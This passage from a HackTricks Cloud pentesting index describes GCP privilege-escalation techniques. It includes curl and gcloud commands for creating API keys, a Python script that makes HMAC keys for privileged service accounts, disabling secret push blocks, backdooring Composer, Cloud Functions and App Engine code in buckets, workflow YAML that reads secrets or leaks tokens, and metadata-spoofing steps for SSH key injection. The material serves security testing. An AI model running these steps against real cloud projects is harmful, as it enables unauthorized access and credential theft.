that identifies an application without any principal . They are useful for accessing public data anonymously , and are used to associate API requests with your project for quota and billing . Therefore, with an API key you can make that company pay for your use of the API, but you won\'t be able to escalate privileges. To learn other permissions and ways to generate API keys check: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1124","title":"serviceusage"},"1125":{"body":"An undocumented API was found that can be used to create API keys: bash curl -XPOST \\"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1125","title":"serviceusage.apiKeys.create"},"1126":{"body":"Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response): bash curl \\"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1126","title":"serviceusage.apiKeys.list"},"1127":{"body":"With these permissions an attacker can enable and use new services in the project. This could allow an attacker to enable service like admin or cloudidentity to try to access Workspace information, or other services to access interesting data.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1127","title":"serviceusage.services.enable , serviceusage.services.use"},"1128":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ Support HackTricks and get benefits! Do you work in a cybersecurity company ? Do you want to see your company advertised in HackTricks ? or do you want to have access the latest version of the PEASS or download HackTricks in PDF ? Check the SUBSCRIPTION PLANS ! Discover The PEASS Family , our collection of exclusive NFTs Get the official PEASS & HackTricks swag Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm . Share your hacking tricks submitting PRs to the hacktricks github repo **** . tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » References","id":"1128","title":"References"},"1129":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1129","title":"GCP - Sourcerepos Privesc"},"113":{"body":"By default repository roles are created: Read : Recommended for non-code contributors who want to view or discuss your project Triage : Recommended for contributors who need to proactively manage issues and pull requests without write access Write : Recommended for contributors who actively push to your project Maintain : Recommended for project managers who need to manage the repository without access to sensitive or destructive actions Admin : Recommended for people who need full access to the project , including sensitive and destructive actions like managing security or deleting a repository You can compare the permissions of each role in this table https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role You can also create your own roles in https://github.com/organizations//settings/roles","breadcrumbs":"Github Security » Basic Github Information » Repository Roles","id":"113","title":"Repository Roles"},"1130":{"body":"For more information about Source Repositories check: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Source Repositories","id":"1130","title":"Source Repositories"},"1131":{"body":"With this permission it\'s possible to download the repository locally: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1131","title":"source.repos.get"},"1132":{"body":"A principal with this permission will be able to write code inside a repository cloned with gcloud source repos clone . But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like: Owner Editor Source Repository Administrator (roles/source.admin) Source Repository Writer (roles/source.writer) To write just perform a regular git push .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.update","id":"1132","title":"source.repos.update"},"1133":{"body":"With this permission an attacker could grant himself the previous permissions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1133","title":"source.repos.setIamPolicy"},"1134":{"body":"If the attacker has access to the secrets where the tokens are stored, he will be able to steal them. For more info about how to access a secret check: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Secret access","id":"1134","title":"Secret access"},"1135":{"body":"It\'s possible to add ssh keys to the Source Repository project in the web console. It makes a post request to /v1/sshKeys:add and can be configured in https://source.cloud.google.com/user/ssh_keys Once your ssh key is set, you can access a repo with: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ And then use git commands are per usual.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Add SSH keys","id":"1135","title":"Add SSH keys"},"1136":{"body":"It\'s possible to create manual credentials to access the Source Repositories: Clicking on the first link it will direct you to https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Which will prompt an Oauth authorization prompt to give access to Google Cloud Development . So you will need either the credentials of the user or an open session in the browser for this. This will send you to a page with a bash script to execute and configure a git cookie in $HOME/.gitcookies Executing the script you can then use git clone, push... and it will work.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Manual Credentials","id":"1136","title":"Manual Credentials"},"1137":{"body":"With this permission it\'s possible to disable Source Repositories default protection to not upload code containing Private Keys: bash gcloud source project-configs update --disable-pushblock You can also configure a different pub/sub topic or even disable it completely: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1137","title":"source.repos.updateProjectConfig"},"1138":{"body":"Reading time: 7 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1138","title":"GCP - Storage Privesc"},"1139":{"body":"Basic Information: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Storage","id":"1139","title":"Storage"},"114":{"body":"You can list the teams created in an organization in https://github.com/orgs//teams . Note that to see the teams which are children of other teams you need to access each parent team.","breadcrumbs":"Github Security » Basic Github Information » Teams","id":"114","title":"Teams"},"1140":{"body":"This permission allows you to download files stored inside Cloud Storage . This will potentially allow you to escalate privileges because in some occasions sensitive information is saved there . Moreover, some GCP services stores their information in buckets: GCP Composer : When you create a Composer Environment the code of all the DAGs will be saved inside a bucket . These tasks might contain interesting information inside of their code. GCR (Container Registry) : The image of the containers are stored inside buckets , which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1140","title":"storage.objects.get"},"1141":{"body":"You can give you permission to abuse any of the previous scenarios of this section .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1141","title":"storage.objects.setIamPolicy"},"1142":{"body":"For an example on how to modify permissions with this permission check this page: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1142","title":"storage.buckets.setIamPolicy"},"1143":{"body":"Cloud Storage\'s \\"interoperability\\" feature, designed for cross-cloud interactions like with AWS S3, involves the creation of HMAC keys for Service Accounts and users . An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges , thus escalating privileges within Cloud Storage . While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible , allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access. bash # Create key\\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\\nPROJECT_ID = \'$PROJECT_ID\'\\nTARGET_SERVICE_ACCOUNT = f\\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\\"\\nACCESS_TOKEN = \\"$CLOUDSDK_AUTH_ACCESS_TOKEN\\"\\nimport requests\\nimport json\\nkey = requests.post( f\'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys\', params={\'access_token\': ACCESS_TOKEN, \'serviceAccountEmail\': TARGET_SERVICE_ACCOUNT}\\n).json()\\n#print(json.dumps(key, indent=4))\\nprint(f\'ID: {key[\\"metadata\\"][\\"accessId\\"]}\')\\nprint(f\'Secret: {key[\\"secret\\"]}\') # Configure gsutil to use the HMAC key\\ngcloud config set pass_credentials_to_gsutil false\\ngsutil config -a # Use it\\ngsutil ls gs://[BUCKET_NAME] # Restore\\ngcloud config set pass_credentials_to_gsutil true Another exploit script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1143","title":"storage.hmacKeys.create"},"1144":{"body":"In order to create a new object inside a bucket you need storage.objects.create and, according to the docs , you need also storage.objects.delete to modify an existent object. A very common exploitation of buckets where you can write in cloud is in case the bucket is saving web server files , you might be able to store new code that will be used by the web application.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Storage Write permissions","id":"1144","title":"storage.objects.create, storage.objects.delete = Storage Write permissions"},"1145":{"body":"Composer is Apache Airflow managed inside GCP. It has several interesting features: It runs inside a GKE cluster , so the SA the cluster uses is accessible by the code running inside Composer All the components of a composer environments ( code of DAGs , plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version. You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1145","title":"Composer"},"1146":{"body":"Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, overwriting the code before the new version gets built it\'s possible to make the cloud function execute arbitrary code . You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1146","title":"Cloud Functions"},"1147":{"body":"AppEngine versions generate some data inside a bucket with the format name: staging..appspot.com. Inside this bucket, it\'s possible to find a folder called ae that will contain a folder per version of the AppEngine app and inside these folders it\'ll be possible to find the manifest.json file. This file contains a json with all the files that must be used to create the specific version. Moreover, it\'s possible to find the real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file. Note that it\'s not possible to pre-takeover this bucket because GCP users aren\'t authorized to generate buckets using the domain name appspot.com. However, with read & write access over this bucket, it\'s possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code. The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the staging..appspot.com bucket: Upload the complete new code of the AppEngine version to a different and available bucket and prepare a manifest.json file with the new bucket name and sha1 hashes of them . Then, when a new version is created inside the bucket, you just need to modify the manifest.json file and upload the malicious one. Upload a modified requirements.txt version that will use a the malicious dependencies code and update the manifest.json file with the new filename, URL and the hash of it. Upload a modified main.py or app.yaml file that will execute the malicious code and update the manifest.json file with the new filename, URL and the hash of it. You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1147","title":"App Engine"},"1148":{"body":"Google Container Registry stores the images inside buckets, if you can write those buckets you might be able to move laterally to where those buckets are being run. The bucket used by GCR will have an URL similar to gs://.artifacts..appspot.com (The top level subdomains are specified here ). tip This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does\'t store the images in buckets.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCR","id":"1148","title":"GCR"},"1149":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » References","id":"1149","title":"References"},"115":{"body":"The users of an organization can be listed in https://github.com/orgs//people. In the information of each user you can see the teams the user is member of , and the repos the user has access to .","breadcrumbs":"Github Security » Basic Github Information » Users","id":"115","title":"Users"},"1150":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1150","title":"GCP - Workflows Privesc"},"1151":{"body":"Basic Information: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1151","title":"Workflows"},"1152":{"body":"Afaik it\'s not possible to get a shell with access to the metadata endpoint containing the SA credentials of the SA attacked to a Workflow. However, it\'s possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow. It\'s possible to find the documentation of the connectors. For example, this is the page of the Secretmanager connector . In the side bar it\'s possible to find several other connectors. And here you can find an example of a connector that prints a secret: yaml main: params: [input] steps: - access_string_secret: call: googleapis.secretmanager.v1.projects.secrets.versions.accessString args: secret_id: secret_name version: 1 project_id: project-id result: str_secret - returnOutput: return: \\"${str_secret}\\" Update from the CLI: bash gcloud workflows deploy \\\\ --service-account=email@SA \\\\ --source=/path/to/config.yaml \\\\ --location us-central1 If you get an error like ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, just wait a minute and try again . If you don\'t have web access it\'s possible to trigger and see the execution of a Workflow with: bash # Run execution with output\\ngcloud workflows run --location us-central1 # Run execution without output\\ngcloud workflows execute --location us-central1 # List executions\\ngcloud workflows executions list # Get execution info and output\\ngcloud workflows executions describe projects//locations//workflows//executions/ caution You can also check the output of previous executions to look for sensitive information Note that even if you get an error like PERMISSION_DENIED: Permission \'workflows.operations.get\' denied on... because you don\'t have that permission, the workflow has been generated.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1152","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1153":{"body":"According to the docs it\'s possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of Cloud Scheduler , the HTTP request with the Oauth token must be to the host .googleapis.com. caution Therefore, it\'s possible to leak the OIDC token by indicating a HTTP endpoint controlled by the user but to leak the OAuth token you would need a bypass for that protection. However, you are still able to contact any GCP api to perform actions on behalf the SA using either connectors or HTTP requests with the OAuth token. Oauth yaml - step_A: call: http.post args: url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop auth: type: OAuth2 scopes: OAUTH_SCOPE OIDC yaml - step_A: call: http.get args: url: https://us-central1-project.cloudfunctions.net/functionA query: firstNumber: 4 secondNumber: 6 operation: sum auth: type: OIDC audience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Leak OIDC token (and OAuth?)","id":"1153","title":"Leak OIDC token (and OAuth?)"},"1154":{"body":"With this permission instead of workflows.workflows.create it\'s possible to update an already existing workflow and perform the same attacks. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1154","title":"workflows.workflows.update ..."},"1155":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Generic Permissions Privesc","id":"1155","title":"GCP - Generic Permissions Privesc"},"1156":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Generic Interesting Permissions","id":"1156","title":"Generic Interesting Permissions"},"1157":{"body":"If you owns a user that has the setIamPolicy permission in a resource you can escalate privileges in that resource because you will be able to change the IAM policy of that resource and give you more privileges over it. This permission can also allow to escalate to other principals if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. cloudfunctions.functions.setIamPolicy Modify the policy of a Cloud Function to allow yourself to invoke it. There are tens of resources types with this kind of permission, you can find all of them in https://cloud.google.com/iam/docs/permissions-reference searching for setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1157","title":"*.setIamPolicy"},"1158":{"body":"These permissions can be very useful to try to escalate privileges in resources by creating a new one or updating a new one . These can of permissions are specially useful if you also has the permission iam.serviceAccounts.actAs over a Service Account and the resource you have .create/.update over can attach a service account.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1158","title":"*.create, *.update"},"1159":{"body":"This permission will usually let you access or modify a Service Account in some resource (e.g.: compute.instances.setServiceAccount). This could lead to a privilege escalation vector, but it will depend on each case. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1159","title":"*ServiceAccount*"},"116":{"body":"Github offers different ways to authenticate to your account and perform actions on your behalf.","breadcrumbs":"Github Security » Basic Github Information » Github Authentication","id":"116","title":"Github Authentication"},"1160":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Network Docker Escape","id":"1160","title":"GCP - Network Docker Escape"},"1161":{"body":"In both writeups where this technique is specified, the attackers managed to get root access inside a Docker container managed by GCP with access to the host network (and the capabilities CAP_NET_ADMIN and CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Initial State","id":"1161","title":"Initial State"},"1162":{"body":"On a Google Compute Engine instance, regular inspection of network traffic reveals numerous plain HTTP requests to the metadata instance at 169.254.169.254. The Google Guest Agent , an open-source service, frequently makes such requests. This agent is designed to monitor changes in the metadata . Notably, the metadata includes a field for SSH public keys . When a new public SSH key is added to the metadata, the agent automatically authorizes it in the .authorized_key file. It may also create a new user and add them to sudoers if needed. The agent monitors changes by sending a request to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true). This request is designed to prompt the metadata server to send a response only if there\'s any change in the metadata since the last retrieval, identified by an Etag (wait_for_change=true&last_etag=). Additionally, a timeout parameter (timeout_sec=) is included. If no change occurs within the specified timeout, the server responds with the unchanged values . This process allows the IMDS (Instance Metadata Service) to respond after 60 seconds if no configuration change has occurred, creating a potential window for injecting a fake configuration response to the guest agent. An attacker could exploit this by performing a Man-in-the-Middle (MitM) attack , spoofing the response from the IMDS server and inserting a new public key . This could enable unauthorized SSH access to the host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Attack Explanation","id":"1162","title":"Attack Explanation"},"1163":{"body":"While ARP spoofing is ineffective on Google Compute Engine networks, a modified version of rshijack developed by Ezequiel can be used for packet injection in the communication to inject the SSH user. This version of rshijack allows inputting the ACK and SEQ numbers as command-line arguments, facilitating the spoofing of a response before the real Metadata server response. Additionally, a small Shell script is used to return a specially crafted payload . This payload triggers the Google Guest Agent to create a user wouter with a specified public key in the .authorized_keys file. The script uses the same ETag to prevent the Metadata server from immediately notifying the Google Guest Agent of different metadata values, thereby delaying the response. To execute the spoofing, the following steps are necessary: Monitor requests to the Metadata server using tcpdump : bash tcpdump -S -i eth0 \'host 169.254.169.254 and port 80\' & Look for a line similar to: